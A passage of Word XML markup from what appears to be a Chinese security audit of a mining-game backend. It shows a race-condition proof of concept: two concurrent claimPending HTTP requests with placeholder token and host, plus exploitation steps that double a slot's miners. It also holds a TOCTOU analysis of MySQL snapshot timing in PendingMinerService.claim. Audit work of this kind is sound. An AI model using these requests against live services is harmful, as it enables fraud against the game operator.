          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recordId=1001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recordId=1002</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，均有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>amount &gt;= 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，目标坑位 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 当前为空。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>并发发送以下两个请求（在客户端使用多线程/异步同时发起）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>请求 1（同时发送）：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/api/miner/claimPending HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;目标服务器&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者合法Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>&lt;签名相关Header&gt;: &lt;合法签名&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"slotId":1,"recordId":1001}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>请求 2（同时发送）：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/api/miner/claimPending HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;目标服务器&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者合法Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>&lt;签名相关Header&gt;: &lt;合法签名&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"slotId":1,"recordId":1002}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="632"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者登录账号，确认存在至少 2 条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PendingMinerReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录（不同 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recordId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="633"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>编写脚本，同时并发提交上述两个请求，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 均为同一目标坑位（如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="634"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>若竞态触发成功，两个请求均返回 HTTP 200 成功响应；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="635"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>此时查询用户矿机列表，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 存在两台矿机；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="636"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 将这两台矿机的算力累加，该坑位挖矿速率翻倍；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">重复此操作（需消耗 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recordId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，但可通过游戏内途径补充），可持续叠加挖矿收益；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="638"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>预期结果：坑位算力异常翻倍，挖矿余额加速增长，突破正常游戏经济上限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="639"/>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640"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">权限级别：普通已登录用户；需拥有 ≥ 2 条不同 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recordId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的待领取矿机记录；需通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 签名校验（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/miner/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在签名校验范围内）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 📎 该 sink 另有 5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受影响调用链（6 条）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="641"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.claimPending → PendingMinerService.java.claim → UserSlotUnlockRepository.java.findByUserIdAndSlotId</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="642"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.claimPending → PendingMinerService.java.claim → UserMinerRepository.java.findByUserIdAndInStorageForUpdate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="643"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.claimPending → PendingMinerService.java.claim → PendingMinerRewardRepository.java.findByIdAndUserIdForUpdate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="644"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.claimPending → PendingMinerService.java.claim → UserMiner.java.setMinerLevel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="645"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.claimPending → PendingMinerService.java.claim → UserMiner.java.setStatus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="646"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.claimPending → PendingMinerService.java.claim → UserMiner.java.setIsCharged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audit_m157_558_claimPending_ctrl-path2of19.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m157_563_claimPending_ctrl-path3of19.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m157_585_claimPending_ctrl-path5of19.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m157_607_claimPending_ctrl-path7of19.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m157_622_claimPending_ctrl-path10of19.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m157_627_claimPending_ctrl-path11of19.md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：PendingMinerService.java#claim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_29" w:id="29"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞28：矿机坑位并发占用竞态条件（TOCTOU — 同一坑位可放入双矿机）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="647"/>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：矿机领取接口并发 TOCTOU 导致高级坑位重复放置矿机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="648"/>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src/main/java/com/gameBack/mjservice/service/PendingMinerService.java:claim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="649"/>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 / TOCTOU（先检查后使用）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="650"/>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651"/>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：普通已登录用户（需持有有效 Bearer Token，需已解锁坑位 7-9）</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claim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndInStorageForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对用户名下所有在役矿机加 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 行锁，意图将"坑位占用检查 → 插入矿机"序列化。然而，在 MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>REPEATABLE READ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（默认隔离级别）下，事务的 MVCC 快照（ReadView）是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>首次一致性读（非锁定读）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>时惰性创建的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">对于坑位 ID 为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>7-9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的请求，在进入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndInStorageForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 加锁步骤之前，代码会先执行：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userSlotUnlockRepository.findByUserIdAndSlotId(userId, slotId)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>这是一次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>普通非锁定读</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，会在此时创建 T2 的 ReadView（快照点为 t_view）。随后 T2 在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndInStorageForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 处被 T1 的行锁阻塞。T1 完成矿机插入并提交（提交时间 t1_commit &gt; t_view），T2 解除阻塞后，后续的坑位存在性检查 </w:t>
